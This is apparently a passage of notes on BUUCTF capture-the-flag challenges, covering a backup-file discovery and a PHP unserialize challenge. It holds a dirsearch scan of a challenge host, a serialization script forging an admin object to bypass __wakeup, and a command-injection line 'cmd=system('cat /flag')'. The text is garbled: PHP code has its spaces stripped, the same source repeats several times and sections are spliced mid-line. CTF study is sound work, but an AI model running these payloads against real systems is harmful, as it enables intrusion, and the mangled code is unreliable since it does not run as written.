<?phpinclude'flag.php';error_reporting(0);className{private$username='nonono';private$password='yesyes';publicfunction__construct($username,$password){$this->username=$username;$this->password=$password;}function__wakeup(){$this->username='guest';}function__destruct(){if($this->password!=100){echo"</br>NO!!!hacker!!!</br>";echo"You name is: ";echo$this->username;echo"</br>";echo"You password is: ";echo$this->password;echo"</br>";die();}if($this->username==='admin'){global$flag;echo$flag;}else{echo"</br>hello my friend~~</br>sorry i can't give you the flag!";die();## [ACTF2020 新生赛]BackupFile```bash
$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/ -t 40 --exclude-status 403,401
[19:57:33]200 - 347B - /index.php.bak
?index.php?key=123
[极客大挑战 2019]PHP
/www.zip
<?phpinclude'flag.php';error_reporting(0);className{private$username='nonono';private$password='yesyes';publicfunction__construct($username,$password){$this->username=$username;$this->password=$password;}function__wakeup(){$this->username='guest';}function__destruct(){if($this->password!=100){echo"</br>NO!!!hacker!!!</br>";echo"You name is: ";echo$this->username;echo"</br>";echo"You password is: ";echo$this->password;echo"</br>";die();}if($this->username==='admin'){global$flag;echo$flag;}else{echo"</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}}?>
<?phpinclude'flag.php';
index.php?cmd=system('cat /flag');error_reporting(0);className{private$username='nonono';private$password='yesyes';publicfunction__construct($username,$password){$this->username=$username;$this->password=$password;}function__wakeup(){$this->username='guest';}function__destruct(){if($this->password!=100){echo"</br>NO!!!hacker!!!</br>";echo"You name is: ";echo$this->username;echo"</br>";echo"You password is: ";echo$this->password;echo"</br>";die();}if($this->username==='admin'){global$flag;echo$flag;}else{echo"</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}}?>$a=newName();$a-> username ='admin';$a-> password ='100';echoserialize($a);
index.php?cmd=system('cat /flag');error_reporting(0);className{private$username='nonono';private$password='yesyes';publicfunction__construct($username,$password){$this->username=$username;$this->password=$password;}function__wakeup(){$this->username='guest';}function__destruct(){if($this->password!=100){echo"</br>NO!!!hacker!!!</br>";echo"You name is: ";echo$this->username;echo"</br>";echo"You password is: ";echo$this->password;echo"</br>";die();}if($this->username==='admin'){global$flag;echo$flag;}else{echo"</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}}?>$a=newName();$a-> username ='admin';$a-> password ='100';echoserialize($a);